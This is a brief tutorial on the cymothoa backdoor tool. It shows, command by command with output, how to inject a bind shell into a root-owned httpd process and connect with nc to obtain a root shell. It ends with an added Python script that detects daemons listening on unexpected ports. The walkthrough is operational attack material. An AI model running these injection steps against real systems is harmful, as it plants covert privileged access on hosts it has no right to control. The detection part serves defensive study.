cymothoa process injection backdoor

Download: https://sourceforge.net/projects/cymothoa/files/
Test environment:
Compiles successfully in a 32-bit environment

[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux

Compilation fails in a 64-bit environment
The backdoor can be injected into any process you have permission to attach to; the shell you get back runs with that process's privileges, and of course it is gone once the process restarts or dies.

[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]# ps axu | grep httpd | grep root | grep -v grep 
root 14988 0.0 0.2 10068 2900 ? Ss 05:38 0:00 /usr/sbin/httpd
[root@localhost cymothoa-1-alpha]# ./cymothoa -p 14988 -s 0 -y 8888 // 14988 is the PID of the process to inject into
[+] attaching to process 14988

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffdfe ebx value: 0x0
 esp value: 0xbfd121bc eip value: 0x6ed402
 ------------------------------------------------------------

[+] new esp: 0xbfd121b8
[+] injecting code into 0x00d27000
[+] copy general purpose registers
[+] detaching from 14988

[+] infected!!!

For example, after injecting into the httpd process, connect with nc:

[root@localhost cymothoa-1-alpha]# netstat -antlp | grep 8888
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 15036/httpd 
root@kali-vincent:~# nc -vv 172.16.100.156 8888
172.16.100.156: inverse host lookup failed: Unknown host
(UNKNOWN) [172.16.100.156] 8888 (?) open
whoami
root
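Added example from the defender's side (not part of the original notes and not cymothoa's own code): a Python check that parses `netstat -antlp` output and flags a daemon listening on a port outside its expected set, which is exactly what the injected httpd child on 8888 above looks like. The baseline dictionary and the sample netstat lines are constructed assumptions.

```python
import re

# Hypothetical baseline: the ports each daemon is allowed to listen on.
EXPECTED_PORTS = {
    "httpd": {80, 443},
    "sshd": {22},
}

# Constructed sample of `netstat -antlp` output, modelled on the line in the
# notes above: one extra httpd child is listening on 8888.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1234/sshd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 14988/httpd
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 15036/httpd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2345/master
"""

# Matches a LISTEN line: local address:port, foreign address, PID/program.
LINE_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN\s+"
    r"(?P<pid>\d+)/(?P<prog>\S+)"
)


def parse_listeners(netstat_output):
    """Return (pid, program, port) for every LISTEN line in the output."""
    found = []
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            found.append((int(m.group("pid")), m.group("prog"), int(m.group("port"))))
    return found


def unexpected_listeners(netstat_output, baseline=EXPECTED_PORTS):
    """Listeners whose program is in the baseline but whose port is not.

    A daemon that suddenly listens on an extra port (httpd on 8888 after the
    bind-shell payload is injected) is the signal this catches.
    """
    return [
        (pid, prog, port)
        for pid, prog, port in parse_listeners(netstat_output)
        if prog in baseline and port not in baseline[prog]
    ]


if __name__ == "__main__":
    for pid, prog, port in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"ALERT pid={pid} program={prog} unexpected listen port={port}")
```

On a live host, feed the function the real output of `netstat -antlp` (or `ss -ltnp` with an adjusted regex) and maintain the baseline per machine.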